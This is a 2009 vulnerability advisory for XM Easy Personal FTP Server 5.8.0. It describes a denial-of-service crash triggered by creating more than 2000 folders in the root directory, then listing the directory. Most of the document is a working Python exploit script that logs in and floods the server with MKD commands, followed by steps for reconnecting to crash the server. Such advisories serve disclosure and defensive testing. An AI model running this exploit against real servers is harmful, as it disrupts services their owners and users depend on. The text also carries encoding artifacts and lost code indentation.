Date of Discovery: 24-Nov-2009=0D
=0D
Credits:leinakesi[at]gmail.com=0D
=0D
Vendor: Dxmsoft=0D
*******************************************************************************=0D
Affected:=0D
=0D
XM Easy Personal FTP Server 5.8.0=0D
Earlier versions may also be affected=0D
*******************************************************************************=0D
Overview:=0D
=0D
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in =0D
=0D
the root directory.=0D
*******************************************************************************=0D
Details:=0D
=0D
if you could log on the server, take the following steps and the server will =0D
=0D
crash which lead to DoS.=0D
=0D
1.upload 2000 files or folders.=0D
2.close the current connection.=0D
3.use a ftp client to reconnect the server.=0D
user ...=0D
pass ...=0D
port ...=0D
list ...=0D
crash!!!!!!=0D
*******************************************************************************=0D
Exploit example:=0D
=0D
1.upload 2000 folders.=0D
#!/usr/bin/python=0D
import socket=0D
import sys=0D
=0D
def Usage():=0D
print ("Usage: ./expl.py \n")=0D
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")=0D
if len(sys.argv) <> 4:=0D
Usage()=0D
sys.exit(1)=0D
else:=0D
hostname=sys.argv[1]=0D
username=sys.argv[2]=0D
passwd=sys.argv[3]=0D
test_string='a'=0D
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)=0D
try:=0D
sock.connect((hostname, 21))=0D
except:=0D
print ("Connection error!")=0D
sys.exit(1)=0D
r=sock.recv(1024)=0D
sock.send("user %s\r\n" %username)=0D
r=sock.recv(1024)=0D
sock.send("pass %s\r\n" %passwd)=0D
=0D
for i in range(1,200):=0D
sock.send("mkd " + "a" * i +"\r\n")=0D
print "[-] " + ("mkd " + "a" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "b" * i +"\r\n")=0D
print "[-] " + ("mkd " + "b" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "c" * i +"\r\n")=0D
print "[-] " + ("mkd " + "c" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "d" * i +"\r\n")=0D
print "[-] " + ("mkd " + "d" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "e" * i +"\r\n")=0D
print "[-] " + ("mkd " + "e" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "f" * i +"\r\n")=0D
print "[-] " + ("mkd " + "f" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "g" * i +"\r\n")=0D
print "[-] " + ("mkd " + "g" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "h" * i +"\r\n")=0D
print "[-] " + ("mkd " + "h" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "i" * i +"\r\n")=0D
print "[-] " + ("mkd " + "i" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
for i in range(1,200):=0D
sock.send("mkd " + "j" * i +"\r\n")=0D
print "[-] " + ("mkd " + "j" * i +"\r\n")=0D
r=sock.recv(1024)=0D
print "[+] " + r + "\r\n"=0D
=0D
sock.close()=0D
sys.exit(0);=0D
=0D
2.use a ftp client to reconnect the server=0D
for example:=0D
start->run->cmd->ftp 127.0.0.1->*****->*****->dir=0D
=0D